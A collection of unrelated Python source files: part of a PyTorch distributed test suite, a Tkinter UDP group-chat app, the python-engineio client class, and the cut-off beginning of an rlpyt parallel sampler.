result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.destroy_process_group()
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
# intentionally not calling into `destroy_process_group` as not all
# user applications would explicitly that.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
Chat.py
|
import socket
import sys
from threading import Thread
from tkinter import *
from tkinter import messagebox
# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = "0.0.0.0"
port = 81
s.bind((ip, port))
num = 1
users = {"192.168.56.102": ["JOHN", "dark green"],
"192.168.56.103": ["TOM", "DarkOrchid4"]}
# send and display the data on button click
def clicked():
global num
try:
data = txtfld.get().rstrip()
if data != '':
for ip in users.keys():
s.sendto(data.encode(), (ip, 81))
Label(msgframe, text=f"▷ {data}", fg='SlateBlue4', font=10, bg='lavender').grid(
row=num, column=1, sticky=E, padx=20)
num += 1
canvas.yview_moveto('1.0')
except Exception as e:
messagebox.showerror('Error', e)
# recieving data and display
def recieve():
global num
try:
while True:
data = s.recvfrom(1024)
Label(msgframe, text=f"{users[data[1][0]][0]}:", fg=users[data[1][0]][1], bg='lavender').grid(
row=num, column=0, sticky=W, padx=20)
num += 1
Label(msgframe, text=f"▷ {data[0].decode()}", fg=users[data[1][0]][1], font=10, bg='lavender').grid(
row=num, column=0, sticky=W, padx=20)
num += 1
canvas.yview_moveto('1.0')
except Exception as e:
if s._closed:
print("Program is terminated")
else:
print(e)
# thread to start recieving data
t = Thread(target=recieve)
t.daemon = True
t.start()
# scroller for canvas
def myfunction(event):
canvas.configure(scrollregion = canvas.bbox("all"))
# setting width of msgframe equal to canvas width
def frameWidth(event):
canvas_width = event.width
canvas.itemconfig(canvas_frame, width = canvas_width)
# creating window
root = Tk()
root.title('ChAt (192.168.56.1) - Hello Eric!')
root.geometry("700x600+350+150")
uinput = StringVar()
# header frame
head = Frame(root, relief=RAISED, borderwidth=0, bg='bisque')
head.pack(fill=X, side=TOP)
Label(head, text="Group Chat", font=15, bg='bisque').pack(
side='left', padx=10, pady=4)
# frame where message will print, in a scrollable canvas
myframe = Frame(root, relief=GROOVE, bd=1)
myframe.pack(fill=BOTH, expand=True, side=TOP)
canvas = Canvas(myframe, bg='lavender')
msgframe = Frame(canvas, relief=RAISED, borderwidth=0, bg='lavender')
msgframe.columnconfigure(1, weight=1)
msgframe.pack(fill=BOTH, expand=True, side=TOP, pady=20)
myscrollbar = Scrollbar(myframe, orient="vertical", command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right", fill="y", expand=False)
canvas.pack(fill=BOTH, side="top", expand=True)
canvas_frame = canvas.create_window(0, 0, window=msgframe, anchor='nw')
msgframe.bind("<Configure>", myfunction)
canvas.bind('<Configure>', frameWidth)
# footer frame, taking input
frame = Frame(root, relief=RAISED, borderwidth=0, bg='bisque')
frame.pack(fill=X, side=BOTTOM)
btn = Button(frame, text="SEND", fg='SlateBlue4', width=10, font=4,
activeforeground='white', activebackground='SlateBlue4', borderwidth=1, command=clicked)
btn.pack(side=RIGHT, expand=True, padx=10, pady=4)
txtfld = Entry(frame, textvariable=uinput, bd=1,
width=150, font=10, fg='SlateBlue4')
txtfld.pack(side=BOTTOM, expand=True, padx=10, pady=4)
# looping the window
root.mainloop()
s.close()
sys.exit()
|
client.py
|
from base64 import b64encode
from engineio.json import JSONDecodeError
import logging
import queue
import signal
import ssl
import threading
import time
import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, custom CA bundle, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, str):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
raise exceptions.ConnectionError(
'Unexpected response from server') from None
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.error('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if isinstance(self.http.verify, str):
if 'sslopt' in extra_options:
extra_options['sslopt']['ca_certs'] = self.http.verify
else:
extra_options['sslopt'] = {'ca_certs': self.http.verify}
elif not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
self.ws.settimeout(self.ping_interval + self.ping_timeout)
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PING:
self._send_packet(packet.Packet(packet.PONG, pkt.data))
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
if not self.ssl_verify:
self.http.verify = False
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=4').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketTimeoutException:
self.logger.warning(
'Server has stopped communicating, aborting')
self.queue.put(None)
break
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode()
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
|
base.py
|
import multiprocessing as mp
import ctypes
import time
from rlpyt.samplers.base import BaseSampler
from rlpyt.samplers.buffer import build_samples_buffer
from rlpyt.samplers.parallel.worker import sampling_process
from rlpyt.utils.logging import logger
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.synchronize import drain_queue
EVAL_TRAJ_CHECK = 0.1 # seconds.
class ParallelSamplerBase(BaseSampler):
gpu = False
######################################
# API
######################################
def initialize(
self,
agent,
affinity,
seed,
bootstrap_value=False,
traj_info_kwargs=None,
world_size=1,
rank=0,
worker_process=None,
):
n_envs_list = self._get_n_envs_list(affinity=affinity)
self.n_worker = n_worker = len(n_envs_list)
B = self.batch_spec.B
global_B = B * world_size
env_ranks = list(range(rank * B, (rank + 1) * B))
self.world_size = world_size
self.rank = rank
if self.eval_n_envs > 0:
self.eval_n_envs_per = max(1, self.eval_n_envs // n_worker)
self.eval_n_envs = eval_n_envs = self.eval_n_envs_per * n_worker
logger.log(f"Total parallel evaluation envs: {eval_n_envs}.")
self.eval_max_T = eval_max_T = int(self.eval_max_steps // eval_n_envs)
if self.is_pixel:
env_spaces = self._get_env_spaces(self.EnvCls, self.env_kwargs)
self._agent_init(agent, env_spaces, global_B=global_B,
env_ranks=env_ranks)
else:
env = self.EnvCls(**self.env_kwargs)
# env.reset()
# env.step(env.action_space.sample())
